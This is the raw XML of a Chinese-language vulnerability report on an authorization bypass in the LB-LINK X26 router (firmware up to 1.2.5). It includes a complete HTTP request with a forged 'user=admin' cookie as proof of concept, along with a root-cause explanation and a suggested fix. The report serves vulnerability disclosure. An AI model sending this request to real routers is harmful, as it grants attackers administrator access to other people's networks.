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41113" w:rsidRDefault="00971CA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971CA2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LB-LINK X26路由器存在权限控制不严的通用越权漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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一、漏洞介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00523F0D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必联LB-LINK</w:t>
      </w:r>
      <w:r w:rsidR="00737BAF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> X26路由器存在越权漏洞，攻击者可以绕过管理员口令鉴定直接进行管理员后台操作，影响极大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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二、影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="0067742B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LB-LINK x26 固件版本 &lt;= 1.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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三、漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F7887" w:rsidRDefault="001F7887" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A22A3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>版本证明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F47CC" w:rsidRDefault="003245B4" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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2FBD795A" wp14:editId="34189184">
            <wp:extent cx="3452446" cy="1766126"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="4439465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465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9558" cy="176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8BD" w:rsidRDefault="00983857" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00983857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3130062" cy="4175426"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6307822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912" cy="4188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A7C" w:rsidRDefault="00EE3AEE" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541676">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞演示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE3AEE" w:rsidRDefault="00541676" w:rsidP="00BC0965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（具体的可以看视频</w:t>
      </w:r>
      <w:r w:rsidR="00C4500C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>讲解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="003E734E">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="363" w:firstLineChars="0" w:hanging="363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我这里用的两台电脑，模拟攻击者和正常管理员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="000214AE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攻击者用burpsuite发送</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POST请求：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GET /goform/get_router_info HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Host: 192.168.16.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X-Requested-With: XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Accept: application/json, text/javascript, */*; q=0.01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referer: http://192.168.16.1/admin/main.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cookie: platform=0; user=admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="00054AA9" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054AA9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00054AA9" w:rsidRPr="009B70B7" w:rsidRDefault="00054AA9" w:rsidP="00054AA9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1167" w:rsidRPr="00EB1167" w:rsidRDefault="00EB1167" w:rsidP="00EB1167">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1167" w:rsidRDefault="00EB1167">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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在没有管理员登录的情况下，是无法获取信息的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="0063717D" w:rsidP="00266DD8">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="36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2138217E" wp14:editId="62DF5A38">
            <wp:extent cx="5274310" cy="3229610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="427610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106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444" w:rsidRDefault="009B70B7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而只要管理员登录后</w:t>
      </w:r>
      <w:r w:rsidR="005200AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，再次发送</w:t>
      </w:r>
      <w:r w:rsidR="001754CC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，就能够越权以管理员身份获得信息</w:t>
      </w:r>
      <w:r w:rsidR="005200AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005200AA" w:rsidRDefault="005200AA" w:rsidP="005200AA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="36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noProof/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15441792" wp14:editId="16F9A0EA">
            <wp:extent cx="4378569" cy="2481330"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1609725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7253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1497" cy="248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444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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四、触发原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="006B4AB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Web端burpsuite抓包可以发现，没有采用SESSIONID等唯一标识符来标识管理员会话，导致任意network adjacent的攻击者都可以伪造管理员身份（要求管理员在线）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4ABF" w:rsidRDefault="001B6558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B20774" wp14:editId="6F869557">
            <wp:extent cx="5274310" cy="3884295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1055234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346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444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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五、修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00AD37CA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Cookie加入JWT，SESSION ID之类的，防止任意用户伪造身份。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002C54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21184E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B21184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num w:numId="1" w16cid:durableId="14760251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zlkOGQ2NjJiMDJkNWMwNmQzOTFmZjRmMjdhOTliYjMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00B10677"/>
    <w:rsid w:val="000214AE"/>
    <w:rsid w:val="00024315"/>
    <w:rsid w:val="00045439"/>
    <w:rsid w:val="00053388"/>
    <w:rsid w:val="00054AA9"/>
    <w:rsid w:val="0005608D"/>
    <w:rsid w:val="00087178"/>
    <w:rsid w:val="000A1545"/>
    <w:rsid w:val="00102F1E"/>
    <w:rsid w:val="00152EA0"/>
    <w:rsid w:val="00157A5C"/>
    <w:rsid w:val="001754CC"/>
    <w:rsid w:val="001778FB"/>
    <w:rsid w:val="00184E8C"/>
    <w:rsid w:val="0018616F"/>
    <w:rsid w:val="001A28BD"/>
    <w:rsid w:val="001B6558"/>
    <w:rsid w:val="001D1370"/>
    <w:rsid w:val="001F7887"/>
    <w:rsid w:val="00200B31"/>
    <w:rsid w:val="00202A79"/>
    <w:rsid w:val="002103FE"/>
    <w:rsid w:val="00212FA4"/>
    <w:rsid w:val="00265157"/>
    <w:rsid w:val="00265C67"/>
    <w:rsid w:val="00266DD8"/>
    <w:rsid w:val="00273B36"/>
    <w:rsid w:val="00274B4B"/>
    <w:rsid w:val="002777CC"/>
    <w:rsid w:val="002A22A3"/>
    <w:rsid w:val="002A32EC"/>
    <w:rsid w:val="002A7888"/>
    <w:rsid w:val="002C5444"/>
    <w:rsid w:val="002D5404"/>
    <w:rsid w:val="002E03DA"/>
    <w:rsid w:val="00303FF3"/>
    <w:rsid w:val="00322F87"/>
    <w:rsid w:val="003245B4"/>
    <w:rsid w:val="00332223"/>
    <w:rsid w:val="00341B5B"/>
    <w:rsid w:val="003855B6"/>
    <w:rsid w:val="003A29FB"/>
    <w:rsid w:val="003B3C3F"/>
    <w:rsid w:val="003B460E"/>
    <w:rsid w:val="003C164B"/>
    <w:rsid w:val="003E0CFF"/>
    <w:rsid w:val="003E3BD0"/>
    <w:rsid w:val="003E67CE"/>
    <w:rsid w:val="003E734E"/>
    <w:rsid w:val="0040279B"/>
    <w:rsid w:val="004257F9"/>
    <w:rsid w:val="0045236F"/>
    <w:rsid w:val="00455762"/>
    <w:rsid w:val="004575AD"/>
    <w:rsid w:val="00457890"/>
    <w:rsid w:val="0047651E"/>
    <w:rsid w:val="004845F5"/>
    <w:rsid w:val="00496547"/>
    <w:rsid w:val="004B2303"/>
    <w:rsid w:val="004D00B4"/>
    <w:rsid w:val="004E1353"/>
    <w:rsid w:val="004E6D84"/>
    <w:rsid w:val="004F592E"/>
    <w:rsid w:val="004F63C6"/>
    <w:rsid w:val="00511FD2"/>
    <w:rsid w:val="00511FDF"/>
    <w:rsid w:val="00514041"/>
    <w:rsid w:val="005200AA"/>
    <w:rsid w:val="00523F0D"/>
    <w:rsid w:val="00526EFE"/>
    <w:rsid w:val="00535A9F"/>
    <w:rsid w:val="00537A67"/>
    <w:rsid w:val="00541676"/>
    <w:rsid w:val="00545E91"/>
    <w:rsid w:val="005622A8"/>
    <w:rsid w:val="00563BC4"/>
    <w:rsid w:val="005813B4"/>
    <w:rsid w:val="005A5798"/>
    <w:rsid w:val="005B4FE4"/>
    <w:rsid w:val="005E37B1"/>
    <w:rsid w:val="005E7DBC"/>
    <w:rsid w:val="005F1AC1"/>
    <w:rsid w:val="00612727"/>
    <w:rsid w:val="0063717D"/>
    <w:rsid w:val="00644A7C"/>
    <w:rsid w:val="0064725A"/>
    <w:rsid w:val="006539BB"/>
    <w:rsid w:val="00662AB7"/>
    <w:rsid w:val="006744F8"/>
    <w:rsid w:val="0067742B"/>
    <w:rsid w:val="006945E6"/>
    <w:rsid w:val="006A379E"/>
    <w:rsid w:val="006B4ABF"/>
    <w:rsid w:val="006F47CC"/>
    <w:rsid w:val="006F6F4C"/>
    <w:rsid w:val="006F7B74"/>
    <w:rsid w:val="00730899"/>
    <w:rsid w:val="00733898"/>
    <w:rsid w:val="00737BAF"/>
    <w:rsid w:val="00751D32"/>
    <w:rsid w:val="007A0B81"/>
    <w:rsid w:val="007B0BAD"/>
    <w:rsid w:val="007C3E9D"/>
    <w:rsid w:val="008103FF"/>
    <w:rsid w:val="00813686"/>
    <w:rsid w:val="00815D52"/>
    <w:rsid w:val="008269C9"/>
    <w:rsid w:val="008345A2"/>
    <w:rsid w:val="00836F5B"/>
    <w:rsid w:val="0083735C"/>
    <w:rsid w:val="00855631"/>
    <w:rsid w:val="00860697"/>
    <w:rsid w:val="008643B6"/>
    <w:rsid w:val="00864D8F"/>
    <w:rsid w:val="0086667B"/>
    <w:rsid w:val="00883780"/>
    <w:rsid w:val="008B1897"/>
    <w:rsid w:val="008C02E8"/>
    <w:rsid w:val="008C0EEA"/>
    <w:rsid w:val="008C62C5"/>
    <w:rsid w:val="008E04C6"/>
    <w:rsid w:val="00901CF7"/>
    <w:rsid w:val="009146F7"/>
    <w:rsid w:val="0091476E"/>
    <w:rsid w:val="009151CB"/>
    <w:rsid w:val="0091696A"/>
    <w:rsid w:val="00934CAC"/>
    <w:rsid w:val="00941113"/>
    <w:rsid w:val="00955D97"/>
    <w:rsid w:val="00971CA2"/>
    <w:rsid w:val="00983857"/>
    <w:rsid w:val="00985126"/>
    <w:rsid w:val="009B24A1"/>
    <w:rsid w:val="009B70B7"/>
    <w:rsid w:val="009C2F89"/>
    <w:rsid w:val="009C31ED"/>
    <w:rsid w:val="009C41D9"/>
    <w:rsid w:val="009C62A0"/>
    <w:rsid w:val="009D1E72"/>
    <w:rsid w:val="009E1F17"/>
    <w:rsid w:val="009E622B"/>
    <w:rsid w:val="009F4A94"/>
    <w:rsid w:val="00A0294C"/>
    <w:rsid w:val="00A1155A"/>
    <w:rsid w:val="00A22D3C"/>
    <w:rsid w:val="00A24B67"/>
    <w:rsid w:val="00A576F2"/>
    <w:rsid w:val="00A81CA0"/>
    <w:rsid w:val="00A85771"/>
    <w:rsid w:val="00A85F3E"/>
    <w:rsid w:val="00AB0348"/>
    <w:rsid w:val="00AB1085"/>
    <w:rsid w:val="00AD37CA"/>
    <w:rsid w:val="00B00B9F"/>
    <w:rsid w:val="00B04F42"/>
    <w:rsid w:val="00B10677"/>
    <w:rsid w:val="00B2403E"/>
    <w:rsid w:val="00B308DF"/>
    <w:rsid w:val="00B33161"/>
    <w:rsid w:val="00B33CE8"/>
    <w:rsid w:val="00B42683"/>
    <w:rsid w:val="00B5182D"/>
    <w:rsid w:val="00B57E35"/>
    <w:rsid w:val="00B67204"/>
    <w:rsid w:val="00B74F6B"/>
    <w:rsid w:val="00B84277"/>
    <w:rsid w:val="00B90051"/>
    <w:rsid w:val="00B940ED"/>
    <w:rsid w:val="00BA12E4"/>
    <w:rsid w:val="00BA48AA"/>
    <w:rsid w:val="00BC0965"/>
    <w:rsid w:val="00BD2DD7"/>
    <w:rsid w:val="00BD410B"/>
    <w:rsid w:val="00BD4357"/>
    <w:rsid w:val="00BD4C3C"/>
    <w:rsid w:val="00C0166C"/>
    <w:rsid w:val="00C0620A"/>
    <w:rsid w:val="00C25268"/>
    <w:rsid w:val="00C304D3"/>
    <w:rsid w:val="00C4500C"/>
    <w:rsid w:val="00C45658"/>
    <w:rsid w:val="00C54A7A"/>
    <w:rsid w:val="00C6169A"/>
    <w:rsid w:val="00C67F99"/>
    <w:rsid w:val="00C800E9"/>
    <w:rsid w:val="00C91084"/>
    <w:rsid w:val="00CA14D5"/>
    <w:rsid w:val="00CC7A82"/>
    <w:rsid w:val="00CE7B3A"/>
    <w:rsid w:val="00D04933"/>
    <w:rsid w:val="00D30811"/>
    <w:rsid w:val="00D32B1E"/>
    <w:rsid w:val="00D43EF5"/>
    <w:rsid w:val="00D447B7"/>
    <w:rsid w:val="00D51C2D"/>
    <w:rsid w:val="00D54B57"/>
